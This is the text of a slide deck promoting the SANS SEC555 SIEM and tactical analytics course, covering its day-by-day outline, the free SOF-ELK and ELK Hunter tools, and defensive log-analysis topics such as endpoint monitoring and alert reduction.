industry’s first neutral siem training course · sec555 | siem with tactical analysis 3 welcome!...

SEC555

Industry’s First Neutral SIEM Training Course

Justin Henderson (GSE # 108)

@SecurityMapper

SIEM and Tactical Analytics

SEC555 | SIEM with Tactical Analysis 2

About Me

• Author of SEC555: SIEM and Tactical Analytics

• GIAC GSE # 108, Cyber Guardian Blue and Red

• 58 industry certifications (need to get a new hobby)

• Two time NetWars Core tournament winner (offense)

• And security hobbyist and community supporter

• Collecting interns/contributors in bulk (research teams)

• Release research to the community

• See https://github.com/SMAPPER

https://github.com/SMAPPER


Welcome!

A copy of this talk is available at https://www.securitymapper.com

At end of presentations links will be provided to download SOF-ELK and ELK Hunter

• More on these later…

Also https://github.com/SMAPPER

https://www.securitymapper.com/

https://github.com/SMAPPER


Vendor Specific Training

SIEM is an advanced tool with many use cases

• Requires training for proper utilization

Vendor specific training focuses on how to use their tool

• This is important and makes sense

• But focus on tool lacks a focus on people and process

HowWhat Why When

Where


SEC555 Training

SEC555: SIEM with Tactical Analytics is product neutral

• Focus is on utilizing a SIEM for tactical defense

• Puts focus on people and process

Sets direction for designing and building an effective SIEM

• Learn how to build your own or revitalize what you have

HowWhat

WhyWhen

Where


Hewlett Packard – State of Security Operations

Annual study measures maturity of organizations

• Score ranges from 0 (no maturity) to 5 (full maturity)

• Level of 3 is ideal for most enterprise SOCs

• Scores broken down by people, processes, technology, and business integration

Five year overall average is 1.45

• Lowest scores year after year are people and processes


Why SEC555?

Working with multiple organizations there were clearly gaps in SIEM deployments

Example: One organization spent 14 months in deployment

• SIEM was within top 5 of magic quadrant 2014 + 2015

• Two employees during roll out (> 1 FTE of labor for 14 months)

• Within less than 1 month open source solution exceeded what they had


SIEM Deployment

Well they must have lacked training and planning, right?

• Both employees attended week long vendor training

• POC lasted well over three months

• Implementation had >30 days of vendor services

• One employee hired as dedicated FTE to SIEM

• One PTE and other employee(s) available to help

Above looks better than what some organizations have


What Happened?

Ultimately the company discarded commercial solution

• Open source solution still in place

Discard was not due to a faulty commercial solution

• Again, product is a multi year leader in magic quadrant

People and processes are more important than the tool

• Open source met needs and saved them money

SEC555 is not about switching solutions…

• Focus is to train people how to use any SIEM (tool)


Sample Concepts

Below are a few concepts addressed in SEC555:

• What to collect, where to get it, and how to collect it

• Quantity vs Quality

• Turning low value data into high value data

• Overwhelming alerts

• Inability to identify logs of interest

• Lack of processes and use cases


Course Outline

• Day 1 - SIEM Architecture

• Day 2 - Service Profiling with SIEM

• Day 3 - Endpoint Analytics

• Day 4 - Baselining and User Behavior Monitoring

• Day 5 - Correlation and Post-Mortem Analysis

• Day 6 - Capstone: Design, Detect, Defend

Days 1 - 5 are boot camp (means lots of hands on labs)

* Day titles subject to change (content should not)


Day 1 - SIEM Architecture

SIEM can be complicated but does not always have to be

• Covers SIEM using a building block approach

• Demystifies complexity and makes it easier to use

Learn how to effectively implement log collection, aggregation, storage strategies, and more

• 5 out of 5 interns built and understood ELK Hunter* in less than two weeks


Day 2 - Service Profiling with SIEM

Service Logs Augmentation Techniques

• DNS

• HTTP

• HTTPS

• SMTP

Almost every network uses them

• Lots of noise = lots of logs

• Yet can be high value

Low value logs can morph into highly actionable detects

• Baby Domains

• Entropy Test (PH Imbalance)

• Invalid Fields (wrong state)

• Fuzzy Phishing


Day 3 - Endpoint Analytics

Endpoint logs are incredibly powerful yet underutilized

• Too much emphasis has been placed on “insert security product here”

• Endpoint logs can readily be operationalized

Strategies such as below can be used to detect attacks using

• Long command lines

• Unauthorized service creations

• Malicious PowerShell use

• Internal Pivoting

• Brute force logins

• Whitelist evasion


Collection Strategies

Many attacks today are client side attacks

• Means the attack occurs at the desktop

• If desktops are main point of attack… you might need logs from them

Part of day 3 is a focus on collection strategies

• Such as minimizing the impact of desktop logs

• Emphasis is on actionable collection that scales


Day 4 - Baselining and User Behavior Monitoring

Knowing how malware and hackers operate is important and helps

• Yet knowing yourself is more important

• Detects unauthorized changes

• Works with zero days… and everything

Example: This author’s wife can detect a 1 degree

change in household temperature

- Catches me changing thermostat… every time

- Or kids turning on heater


Day 5 - Correlation and Post-Mortem Analysis

Many public breaches have suffered from too many alerts per analyst

• 1 person @ 1 mil alerts a day = fail

• Focus is on how to put context behind alerts and go tactical

Other key concepts covered:

• Post-mortem detection of evil

• Fighting dirty with tripwires


Day 6 - Capstone: Design, Detect, Defend

Class combines hands on labs all week

• But just to drive things home day 6 is 100% lab

Defense based capture the flag

• Winners will receive a coveted SANS challenge coin

• Most importantly everyone wins by receiving hands on experience


SOF-ELK

A SIEM course requires a SIEM

• To remain neutral concepts are taught using SOF-ELK

SOF-ELK is a combination of open source solutions

• Maintained by Phil Hagen (FOR572 author) and Justin Henderson (SEC555 author)

• Effectively is a free SIEM in a box

• Built for forensics and SOC use

• Did I mention it is free?


SOF-ELK Components

Primary components consist of:

• Elasticsearch - Big data storage search platform

• Logstash - Log aggregation, parsing, and transformer

• Kibana - Used for reporting, visualizations, and dashboards

• Other components constantly being baked in such as:

• Mark Baggett’s freq_server.py and domain_stats.py

• Mark is the author of SEC573 and I’m pretty sure he regularly wears a cape and flies around saving the world


ELK Hunter

Designed for analysis, research, and proof of concept

• ELK Hunter is a test bed for configs and concepts

• Contains Security Onion, ELK, and analysis scripts

• Designed to plug into network or deploy to hypervisor

• Verifies legitimacy of techniques and configurations

• Discover new techniques or abnormal behaviors

• Performs mass pcap analysis such as Contagio dumps

• Project in pipeline to add mass analysis of Windows logs


No Strings Attached

For those of you who do not have a SIEM this course:

• Gives you a free SIEM (SOF-ELK)

• Shows you what to look for in a commercial SIEM

If you already have a SIEM you will:

• Be able to operationalize, enhance, and revitalize existing SIEM

• Be able to apply open source solutions that can integrate with existing SIEM to lower costs and/or handle high EPS logs

Regardless of SIEM situation this class is designed for you


Return on Investment (ROI)

Immediately after taking this course you will be able to:

• Understand and apply SIEM use, architecture, and best practices

• Identify data sources to collect logs from

• Deploy scalable log solutions that can handle any number of logs

• Enhance logs to obtain added value and correlation capabilities

• Build actionable visualizations and dashboards

• Detect adversaries by using their own tactics against them

• Establish baselines and identify unauthorized deviations

• Minimize and reduce alerts to items of interests

industry’s first neutral siem training course · sec555 | siem with tactical analysis 3 welcome!...

Documents